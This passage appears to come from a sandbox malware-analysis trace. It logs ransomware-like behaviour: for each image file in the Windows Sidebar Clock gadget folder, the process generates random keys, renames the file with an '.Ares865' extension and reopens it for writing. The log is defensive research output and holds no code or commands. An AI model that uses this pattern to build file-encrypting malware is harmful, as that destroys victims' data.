| out: lpFileSize=0x2cce090*=368) returned 1 [0118.869] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.870] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.870] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.872] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.873] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.873] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.874] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png.Ares865") returned 86 [0118.874] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png.ares865"), dwFlags=0x1) returned 1 [0118.875] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.876] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0118.876] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.877] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.877] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.880] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.881] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.881] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.882] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png.Ares865") returned 86 [0118.882] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png.ares865"), dwFlags=0x1) returned 1 [0118.883] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2956) returned 1 [0118.884] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.884] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.884] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.887] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.887] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.887] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png.Ares865") returned 93 [0118.888] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png.ares865"), dwFlags=0x1) returned 1 [0118.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32695) returned 1 [0118.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.891] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.891] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.894] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.895] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.895] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png.Ares865") returned 85 [0118.896] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png.ares865"), dwFlags=0x1) returned 1 [0118.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34670) returned 1 [0118.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.899] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.899] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.903] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.903] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.903] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.904] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png.Ares865") returned 89 [0118.904] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png.ares865"), dwFlags=0x1) returned 1 [0118.906] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.906] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=321) returned 1 [0118.906] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.907] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.907] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.910] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.911] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.911] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png.Ares865") returned 87 [0118.912] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png.ares865"), dwFlags=0x1) returned 1 [0118.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=388) returned 1 [0118.914] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.914] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.914] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.917] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.918] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.918] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.919] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png.Ares865") returned 87 [0118.919] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png.ares865"), dwFlags=0x1) returned 1 [0118.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.921] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=439) returned 1 [0118.921] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.922] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.922] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.925] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.926] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.926] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png.Ares865") returned 87 [0118.926] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png.ares865"), dwFlags=0x1) returned 1 [0118.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.928] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3092) returned 1 [0118.928] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.929] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.929] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.931] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.932] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.932] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png.Ares865") returned 94 [0118.933] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png.ares865"), dwFlags=0x1) returned 1 [0118.935] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33403) returned 1 [0118.935] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.936] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.936] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.941] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.941] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.941] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png.Ares865") returned 85 [0118.942] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png.ares865"), dwFlags=0x1) returned 1 [0118.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.944] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15614) returned 1 [0118.944] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.945] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.945] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.950] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.951] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.951] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png.Ares865") returned 89 [0118.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png.ares865"), dwFlags=0x1) returned 1 [0118.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2966) returned 1 [0118.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.955] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.955] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.960] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.960] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png.Ares865") returned 87 [0118.961] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png.ares865"), dwFlags=0x1) returned 1 [0118.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.963] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2922) returned 1 [0118.963] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.964] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.964] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.967] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.968] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.968] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png.Ares865") returned 87 [0118.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png.ares865"), dwFlags=0x1) returned 1 [0118.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2940) returned 1 [0118.971] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.971] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.971] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.976] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.977] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.977] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png.Ares865") returned 87 [0118.977] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png.ares865"), dwFlags=0x1) returned 